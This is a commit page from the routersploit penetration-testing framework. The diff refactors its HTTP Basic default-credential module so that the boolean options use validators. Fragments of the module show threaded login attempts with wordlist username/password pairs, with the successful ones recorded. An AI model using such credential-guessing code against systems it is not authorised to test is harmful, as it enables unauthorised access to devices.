Skip to content

R
routersploit
Commit 3ab4ffe3 by fwkz
Options

Using validators.boolify in creds/http_basic_default

parent 00e9f68b
Showing with 5 additions and 7 deletions
routersploit/modules/creds/http_basic_default.py
...@@ -7,7 +7,6 @@ from routersploit import ( ...@@ -7,7 +7,6 @@ from routersploit import (
print_error, print_error,
print_success, print_success,
print_table, print_table,
boolify,
http_request, http_request,
multi, multi,
validators, validators,
...@@ -42,8 +41,8 @@ class Exploit(exploits.Exploit): ...@@ -42,8 +41,8 @@ class Exploit(exploits.Exploit):
threads = exploits.Option(8, 'Number of threads') threads = exploits.Option(8, 'Number of threads')
defaults = exploits.Option(wordlists.defaults, 'User:Pass or file with default credentials (file://)') defaults = exploits.Option(wordlists.defaults, 'User:Pass or file with default credentials (file://)')
path = exploits.Option('/', 'URL Path') path = exploits.Option('/', 'URL Path')
verbosity = exploits.Option('yes', 'Display authentication attempts') verbosity = exploits.Option('yes', 'Display authentication attempts', validators=validators.boolify)
stop_on_success = exploits.Option('yes', 'Stop on first valid authentication attempt') stop_on_success = exploits.Option('yes', 'Stop on first valid authentication attempt', validators=validators.boolify)
credentials = [] credentials = []
...@@ -83,7 +82,6 @@ class Exploit(exploits.Exploit): ...@@ -83,7 +82,6 @@ class Exploit(exploits.Exploit):
defaults.close() defaults.close()
def target_function(self, user, password): def target_function(self, user, password):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name name = threading.current_thread().name
url = "{}:{}{}".format(self.target, self.port, self.path) url = "{}:{}{}".format(self.target, self.port, self.path)
...@@ -93,9 +91,9 @@ class Exploit(exploits.Exploit): ...@@ -93,9 +91,9 @@ class Exploit(exploits.Exploit):
response = http_request(method="GET", url=url, auth=(user, password)) response = http_request(method="GET", url=url, auth=(user, password))
if response.status_code != 401: if response.status_code != 401:
print_success("Target: {}:{} {}: Authentication Succeed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity) print_success("Target: {}:{} {}: Authentication Succeed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=self.verbosity)
self.credentials.append((self.target, self.port, user, password)) self.credentials.append((self.target, self.port, user, password))
if boolify(self.stop_on_success): if self.stop_on_success:
raise StopThreadPoolExecutor raise StopThreadPoolExecutor
else: else:
print_error("Target: {}:{} {}: Authentication Failed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity) print_error("Target: {}:{} {}: Authentication Failed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=self.verbosity)
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment